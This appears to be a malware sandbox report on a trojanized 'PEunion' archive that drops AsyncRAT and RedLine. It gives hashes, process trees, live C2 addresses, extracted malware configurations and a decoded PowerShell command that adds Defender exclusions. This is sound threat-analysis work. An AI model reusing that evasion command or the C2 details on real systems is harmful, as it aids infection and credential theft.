File name: PEunion 4.0.0.rar

Full analysis: https://app.any.run/tasks/fee89a2b-b34c-4543-b096-e93b60b57945
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Analysis date: April 01, 2023, 15:25:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: asyncrat, redline
Indicators:
MIME: application/x-rar
File info: RAR archive data, v4, os: Win32, flags: RecoveryRecordPresent
MD5: 5E2FD6EF638CE83AB9CF7C77754C7D28
SHA1: B5B6447D5446B09EB0897608E31BD162A9B1F2B8
SHA256: 2FE3C8D7BBAF309D89FDF191BC6459FDD41FFA20FCB220E9A22739020DE6413C
SSDEEP: 196608:+E0487dnId95HeSWCTsovd5snNy5xNsyXqiP7pONeOnLrl6f93J8r/+J:648xId9FWCxdGNaNqiP7q/n16kro

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Prunion.exe (PID: 2884)
      • 2.exe (PID: 3504)
      • 1.exe (PID: 3184)
      • 11.exe (PID: 1752)
      • 7.exe (PID: 1860)
      • 5.exe (PID: 3912)
      • 9.exe (PID: 2816)
      • 10.exe (PID: 5104)
      • 8.exe (PID: 39640)
      • PEunion.exe (PID: 42660)
    • ASYNCRAT detected by memory dumps

      • 1.exe (PID: 3184)
    • REDLINE detected by memory dumps

      • 2.exe (PID: 3504)
      • AppLaunch.exe (PID: 256552)
  • SUSPICIOUS

    • Reads the Internet Settings

      • Prunion.exe (PID: 2884)
      • powershell.exe (PID: 1204)
    • Base64-obfuscated command line is found

      • Prunion.exe (PID: 2884)
    • Starts POWERSHELL.EXE for commands execution

      • Prunion.exe (PID: 2884)
    • BASE64 encoded PowerShell command has been detected

      • Prunion.exe (PID: 2884)
    • Executable content was dropped or overwritten

      • Prunion.exe (PID: 2884)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 1204)
    • Starts CMD.EXE for commands execution

      • 2.exe (PID: 3504)
      • 10.exe (PID: 5104)
    • Connects to unusual port

      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 104064)
      • AppLaunch.exe (PID: 53460)
  • INFO

    • Reads the computer name

      • Prunion.exe (PID: 2884)
      • 1.exe (PID: 3184)
      • 5.exe (PID: 3912)
      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 53460)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 26276)
      • AppLaunch.exe (PID: 104064)
    • Checks supported languages

      • Prunion.exe (PID: 2884)
      • 1.exe (PID: 3184)
      • 2.exe (PID: 3504)
      • 5.exe (PID: 3912)
      • 7.exe (PID: 1860)
      • 11.exe (PID: 1752)
      • 9.exe (PID: 2816)
      • 10.exe (PID: 5104)
      • PEunion.exe (PID: 42660)
      • 8.exe (PID: 39640)
      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 26276)
      • AppLaunch.exe (PID: 53460)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 104064)
    • Manual execution by a user

      • Prunion.exe (PID: 2884)
      • WinRAR.exe (PID: 2640)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2640)
      • WinRAR.exe (PID: 2712)
    • The process checks LSA protection

      • powershell.exe (PID: 1204)
      • Prunion.exe (PID: 2884)
      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 26276)
      • AppLaunch.exe (PID: 53460)
      • AppLaunch.exe (PID: 104064)
    • Create files in a temporary directory

      • Prunion.exe (PID: 2884)
      • powershell.exe (PID: 1204)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1204)
    • Reads settings of System Certificates

      • powershell.exe (PID: 1204)
    • Reads the machine GUID from the registry

      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 26276)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 53460)
      • AppLaunch.exe (PID: 104064)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process: (3184) 1.exe
Botnet: NEW
Version: 0.5.7B
Options
  AutoRun: true
  Mutex: ihouhh
  InstallFolder: %AppData%
  BSoD: true
  AntiVM: true
Certificates
  Cert1: MIIE4DCCAsigAwIBAgIQAMidQ/uiVx3CmiA2bTlSCzANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAY3N3k3eTcwIBcNMjIwMzE1MTAzNjI5WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBjc3eTd5NzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAI96iWfOMlsJMCyF7E8P8+99XJ8W6E8hiszoeI5FbuuvYCEIPNqTrW62aCUclUx0qEIHXZNAtxrgpQ94aMstU0Pgafl/17CBGB0G...
  Server_Signature: LfTwvY62obt2bnO1hsksW49uGmOTQsQ9t9ys/SBLljhn10cyR4y+Z2qG2tB2tm48xs0q0/Llrnqb9AetfL0pvYZkMVTZ7vQITIqBZQ/wAbnRKDxOgS06ioUALczKX9hciGxO0/oWnyLjGLojljKZ41bpfkQ8ymauO7dQWnteo7ojM4/zlgaVERD3xdKYEnQ8MauDJszCmYnziX1OxMhCZintO7UDjmabzYe/daaFGTjxzReSpVVw0MJBgmGbDMENLJL9Uw9Z1+kCLkzPzUkDqWLjm/4gDHlRPda3BlN+dR43...
Keys
  AES: bf630b2d7109edffafc8dec64242c74660f5a03a1c65d4153f070f9eda2d79fc
  Salt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Credentials
  Protocol: pastebin
  URL: https://pastebin.com/raw/mchxnAbT

RedLine

(PID) Process: (3504) 2.exe
C2 (1): 193.106.191.18:37572
Botnet: @Miroskati
Err_msg:
Auth_value: 7632632e4a60a2f35a2a92deeaa3ce8f
US (181)
(PID) Process: (256552) AppLaunch.exe
C2 (1): 79.137.192.9:19788
Botnet: @Miroskati
Err_msg:
Auth_value: c16799aa992748b357b66c7f81245e70
US (160)
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)

EXIF

ZIP

CompressedSize: 11823654
UncompressedSize: 11929703
OperatingSystem: Win32
ModifyDate: 2023:03:24 17:49:34
PackingMethod: Normal
ArchivedFileName: PEunion 4.0.0\PEunion 4.0.0.exe
No data.
All screenshots are available in the full report
Total processes: 69
Monitored processes: 21
Malicious processes: 6
Suspicious processes: 1

Behavior graph

Processes shown in the graph: winrar.exe, prunion.exe, powershell.exe, 1.exe (#ASYNCRAT), 2.exe (#REDLINE), 5.exe, 7.exe, 9.exe, 11.exe, 10.exe, 8.exe, peunion.exe, applaunch.exe (#REDLINE), cmd.exe. Edge types: start, drop and start.

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2712
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\PEunion 4.0.0.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
PID: 2640
CMD: "C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\PEunion 4.0.0.exe" "C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 2884
CMD: "C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Prunion.exe"
Path: C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Prunion.exe
Parent process: explorer.exe
User: admin
Integrity Level: HIGH
Description: PEunion
Exit code: 0
Version: 4,0,0,0
Modules
Images
c:\users\admin\desktop\peunion 4.0.0\peunion 4.0.0\prunion.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1204
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAawBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAeQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAegBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAeQBnACMAPgA="
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: Prunion.exe
Decoded -EncodedCommand (UTF-16LE base64, decoded here for reference; the <#...#> fragments are inline PowerShell comments used as padding): <#ake#>Add-MpPreference <#lyx#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#czi#> -Force <#lyg#>
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
PID: 3184
CMD: "C:\Users\admin\AppData\Local\Temp\1.exe"
Path: C:\Users\admin\AppData\Local\Temp\1.exe
Parent process: Prunion.exe
User: admin
Company: mirrored.to
Integrity Level: HIGH
Description: Mirrored.to v3.0.2
Exit code: 0
Version: 3.0.2.0
Modules
Images
c:\users\admin\appdata\local\temp\1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\gdi32.dll
PID: 3504
CMD: "C:\Users\admin\AppData\Local\Temp\2.exe"
Path: C:\Users\admin\AppData\Local\Temp\2.exe
Parent process: Prunion.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules
Images
c:\windows\system32\ntdll.dll
c:\users\admin\appdata\local\temp\2.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
PID: 3912
CMD: "C:\Users\admin\AppData\Local\Temp\5.exe"
Path: C:\Users\admin\AppData\Local\Temp\5.exe
Parent process: Prunion.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules
Images
c:\users\admin\appdata\local\temp\5.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 1860
CMD: "C:\Users\admin\AppData\Local\Temp\7.exe"
Path: C:\Users\admin\AppData\Local\Temp\7.exe
Parent process: Prunion.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules
Images
c:\users\admin\appdata\local\temp\7.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
PID: 2816
CMD: "C:\Users\admin\AppData\Local\Temp\9.exe"
Path: C:\Users\admin\AppData\Local\Temp\9.exe
Parent process: Prunion.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules
Images
c:\users\admin\appdata\local\temp\9.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
PID: 1752
CMD: "C:\Users\admin\AppData\Local\Temp\11.exe"
Path: C:\Users\admin\AppData\Local\Temp\11.exe
Parent process: Prunion.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules
Images
c:\users\admin\appdata\local\temp\11.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
Total events: 13 532
Read events: 13 248
Write events: 284
Delete events: 0

Modification events

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation: write    Name: LanguageList    Value: en-US

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write    Name: 2    Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write    Name: 1    Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write    Name: 0    Value: C:\Users\admin\Desktop\phacker.zip

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write    Name: name    Value: 120

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write    Name: size    Value: 80

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write    Name: type    Value: 120

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write    Name: mtime    Value: 100

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation: write    Name: Placement    Value: 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000

(PID) Process: (2712) WinRAR.exe    Key: HKEY_CURRENT_USER\Software\WinRAR\General
Operation: write    Name: LastFolder    Value: C:\Users\admin\Desktop
Executable files: 48
Suspicious files: 34
Text files: 204
Unknown types: 4

Dropped files

PID  Process  Filename  Type

2712  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\PEunion 4.0.0.exe  executable
  MD5: 6EB37F6DABD26EC22927CE0A64B88292
  SHA256: C071A2C670D9012AF38A08C70D67C5DC78C7A47E95294F5FF7789A95EB9FA202
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Help\Template.html  html
  MD5: 8FE760D50E2F356019E8D6E642C075F5
  SHA256: 9100ED17ED1EE00F5306B48B11AF760AD53F7BCB7D1E76240146BAF20211A381
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Compression.asm  text
  MD5: FEB8D2DE1663ADC1E141B8F7BB95D6AC
  SHA256: AC2ADD960F9B626020137271676A37D6185B05C55000D2F0858F7E788E0AB37B
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Drop.asm  text
  MD5: 79CCD53FE0C83491CB4A34B3671E1520
  SHA256: B963211F410C26449E4CB2284C08D09FE88C4003C7B37AC72B2519A588564CD7
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Obfuscator\register.txt  text
  MD5: E9F329A48DCB70C6AD95C8AB8FE82EB0
  SHA256: 5DD46720271713BDEF9EDAFE9058DBEE1A10003DEA7CAC4CB5CDB53D68A3A637
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Stub.asm  text
  MD5: A54153CD522D951F6B360C3BD3DE84D0
  SHA256: 195E94C80F787FA5E24168C46FE392D2710E9C6E4B25B31ED73201C3D2BC93FA
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Stage2.asm  text
  MD5: E03EAF459F028CC6FA8669E277C1A17A
  SHA256: A32A88946334B5F32FE890FCB104B090DD38CB32EF7948F5B8382BCC2D8DA61F
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Obfuscator\nop.txt  text
  MD5: F7BBCDD86CBC1D6D0B81720AC1477FDE
  SHA256: 50F8CECBFC4491BB320692EFBC0003B045760683BB63913FD42152DAFC0C922F
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Prunion.exe  executable
  MD5: E32938F0B819FE181AC2D00ABBFFA427
  SHA256: 2347D8878EEE09EF19B9B49A36A3F93E1A5526A621D29C3695A2D4ED671CD3CC
2640  WinRAR.exe  C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Melt.asm  text
  MD5: 78F905EA7378410C450C79CEB3B9012B
  SHA256: 50156675295081D268576F77201B4F78BB466446E18CA4AF410833F16DE7646A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 5
DNS requests: 6
Threats: 0

HTTP requests

No HTTP requests

Connections

PID  Process  IP  Domain  ASN  CN  Reputation

256552  AppLaunch.exe  79.137.192.9:19788  -  Partner LLC  RU  malicious
53460  AppLaunch.exe  94.140.112.105:81  litrazalilibe.xyz  Sia Nano IT  LV  malicious
111252  AppLaunch.exe  193.106.191.16:28958  -  Kanzas LLC  RU  malicious
258880  AppLaunch.exe  193.106.191.18:37572  -  Kanzas LLC  RU  malicious
104064  AppLaunch.exe  62.204.41.141:24758  -  Horizon LLC  RU  malicious

DNS requests

Domain  IP  Reputation

boardparty.xyz  -  malicious
litrazalilibe.xyz  94.140.112.105  malicious

Threats

No threats detected
No debug info